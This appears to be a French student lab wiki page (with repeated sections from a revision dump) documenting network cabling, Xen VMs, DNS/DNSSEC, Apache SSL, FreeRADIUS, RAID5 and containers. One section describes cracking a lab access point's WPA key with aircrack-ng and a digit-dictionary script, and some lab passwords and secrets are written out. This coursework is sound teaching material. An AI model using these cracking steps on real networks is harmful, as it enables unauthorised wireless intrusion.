<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1500px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
== 5. Tests d'intrusion ==<br />
===Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi (wlp2s0) :<br />
<br />
$ airmon-ng start wlp2s0mon<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
===Cassage de clé WEP===<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=48864TP sysres IMA5sc 2018/2019 G72018-12-17T16:05:16Z<p>Mcreteur : /* Serveur Freeradius */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1500px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
